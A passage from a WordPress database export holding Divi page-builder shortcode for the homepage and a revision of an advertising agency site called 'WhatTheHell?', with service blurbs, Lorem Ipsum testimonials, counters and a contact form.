omnis.\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Testimonial\" _builder_version=\"3.25\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Mitch Skolnik\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_1.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Andrel Nahaev\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_3.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Eduard Ungureanu\" job_title=\"Tech Support\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_2.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Tom Ewer\" job_title=\"Blogger\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_5.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_padding=\"110px||110px|\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<p><span>We would love to connect up and join your brand journey. Do not hesitate to question/drop us a line, As discerning mind always take better decision.</span></p>\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form email=\"dhiraj@wthtest1.in8.cdn-alpha.com\" custom_message=\"Hi my name is %%Name%%, Email id is %%Email%% and Mobile No is %%Mobile_No%%, my message is %%Message%%\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"4.4.9\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Mobile_No\" field_title=\"Mobile No\" fullwidth_field=\"on\" _builder_version=\"4.4.9\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"4.4.9\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','134-revision-v1','','','2020-07-09 10:14:54','2020-07-09 10:14:54','',134,'https://52.66.212.87/2020/07/09/134-revision-v1/',0,'revision','',0),(291,1,'2020-07-09 20:05:35','2020-07-09 20:05:35','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.4.9\" background_color=\"#fcd21d\" background_image=\"https://52.66.212.87/wp-content/uploads/2020/07/Desktop-HD.png\" width=\"100%\" width_tablet=\"100%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"100%\" max_width_tablet=\"100%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_margin=\"|auto|1px|auto||\" custom_padding=\"50px||50px|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\" make_fullwidth=\"on\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"10%|8%|10%|8%\" custom_padding__hover=\"|||\"][et_pb_text content_tablet=\"\" content_phone=\"<h1 style=%22text-align: center;%22><span style=%22color: #ffffff;%22>Welcome to</span><br /> <span style=%22color: #ffffff;%22> Advertising</span></h1>\n\" content_last_edited=\"on|phone\" _builder_version=\"4.4.9\" text_font=\"||||||||\" text_font_size=\"18px\" header_font=\"Montserrat|700||on|||||\" header_text_color=\"#f7f7f7\" header_font_size=\"76px\" header_line_height=\"1.3em\" custom_margin=\"6px||40px|||\" animation_style=\"zoom\" animation_duration=\"1200ms\" text_font_tablet=\"\" text_font_phone=\"\" text_font_last_edited=\"on|phone\" text_font_size_tablet=\"\" text_font_size_phone=\"12px\" text_font_size_last_edited=\"on|phone\" header_font_size_tablet=\"64px\" header_font_size_phone=\"40px\" header_font_size_last_edited=\"on|phone\" text_text_shadow_style=\"preset1\" locked=\"off\"]<h1 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Welcome to</span><br /> <span style=\"color: #ffffff;\"> Advertising</span></h1>[/et_pb_text][et_pb_button button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.4.9\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"4px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" animation_style=\"zoom\" animation_duration=\"1200ms\" box_shadow_style=\"preset2\" button_text_color_hover=\"#ffffff\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#ffffff\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#ffffff\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" custom_padding_last_edited=\"on|tablet\" admin_label=\"Service Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"56px||110px|||\" custom_padding_tablet=\"20px||||false|false\" custom_padding_phone=\"12px||40px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>What we do</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Creative\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>It is important for the creative process and our lives. A key component of visual marketing to let businesses succeed.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Media\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Strategically using new age media and creating a media mix effectively to evolve a sales funnel or brand awareness to engagement.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Digital\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Digital has emerged as one of the efficient media, there is no spill over with the help of professional targeting &amp; even individual targeting is possible.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Gaining the competitive edge with Integrated Marketing Communications (IMC) or building product marketing strategy / Go to market strategy, We are in.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p>Online presence of any brand/product/service starts with a well defined and clearly communicated website. Website is the key and elementry step for any advertising campaign. So be ready to a bolder start.</p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Design/Video/Photo\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Design is not Art, Art is about the Artist, &amp; Design is about the user. Blending &amp; Balancing Art, Design, Copy &amp; Business Objective is what we do.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"4.4.9\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#d4b068\" background_color_gradient_start_position=\"65%\" background_color_gradient_end_position=\"65%\" custom_padding=\"|||\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=f47r43eO6BU&t=5s\" image_src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-01.jpg\" _builder_version=\"4.4.9\" animation_direction=\"bottom\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Fun Fact Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_margin=\"|||\" custom_padding=\"60px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2><span style=\"color: #ffffff;\">Generating New Ideas. Solving real Problems</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Ideas are relevant if it has power to solve the real problem at hand. We are always keen on working practical ideas in the realtime business atmosphere.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" admin_label=\"Fun Fact\" _builder_version=\"3.25\" custom_margin=\"|||\" custom_padding=\"40px||40px|\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"10%\"][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Projects\" number=\"350\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Satisfied Clients\" number=\"62\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"100ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Ongoing Projects\" number=\"16\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"200ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Cups Of Coffee\" number=\"906\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"300ms\"][/et_pb_number_counter][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"109px||110px|\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"4\" admin_label=\"Feature\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"86%\" width_tablet=\"80%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"86%\" max_width_tablet=\"80%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"40px||40px|\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-07-1.png\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"8%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"7%||7%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Why choose us?</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it. Always eager to work with people who are looking to do brilliant things to their brands.</span></p>\n<p> <span>We help in realizing brand aspirations through our in-depth research &amp; analytics and translate them into irreverent creative ideas. We always remember that there’s more to marketing communication than top-funnel awareness building through BTL, ATL, Outdoor, or Digital Media Publishing.</span></p>[/et_pb_text][et_pb_button button_url=\"#\" button_text=\"Learn More\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Latest Work Section\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" custom_padding=\"110px||5px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" 